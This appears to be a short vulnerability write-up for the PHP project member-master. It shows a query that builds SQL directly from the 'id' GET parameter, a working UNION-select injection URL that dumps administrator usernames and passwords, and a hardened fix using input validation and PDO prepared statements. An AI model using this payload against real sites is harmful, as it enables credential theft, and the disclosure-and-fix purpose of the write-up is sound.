if (isset($_GET['id'])) {
    // $_GET['id'] is interpolated straight into the SQL string: no cast, no escaping, no binding
    $sql = "select id,username,password,integral,**,email from u_users WHERE 1=1 and id={$_GET['id']} ";
    $res = $pdo->query($sql);
    list($id, $username, $password, $integral, $**, $email) = $res->fetch(PDO::FETCH_NUM);
}
An obvious GET-based injection. Payload that dumps the administrator password:
http://localhost/member-master/member-master/user/xiu_user.php?id=-37 union select 1,2,group_concat(username,0x2a,password,0x20,mpw),4,5,6 from memsystem.u_admin %23
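A hardened replacement for the lookup above, added here as an example and not code from the member-master project. It assumes `$pdo` is an existing PDO connection to the same database and keeps the table and column names shown on the page (the redacted column is left out):

```php
<?php
// Added example (not project code): the same lookup with input validation
// and a server-side prepared statement, so the id can never be parsed as SQL.
// Assumes $pdo is an existing PDO connection to the application database.

function fetchUserById(PDO $pdo, $rawId): ?array
{
    // 1. Validate: a user id must be a positive integer; anything else is refused.
    //    This alone rejects "-37 union select ...", but the real fix is step 2.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }

    // 2. Real (non-emulated) prepared statement: the value travels separately
    //    from the query text. Table and column names cannot be bound, so they
    //    stay as fixed literals and must never come from the request.
    $pdo->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

    $stmt = $pdo->prepare(
        'SELECT id, username, password, integral, email FROM u_users WHERE id = :id'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();

    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

if (isset($_GET['id'])) {
    $user = fetchUserById($pdo, $_GET['id']);
    if ($user === null) {
        http_response_code(404);
        exit('user not found');
    }
    // use $user['username'], $user['email'], ... from here on
}
```

Disabling emulated prepares matters: with emulation on, PDO builds the final SQL string client-side, and the `WHERE 1=1 and` filler from the original is dropped because it adds nothing.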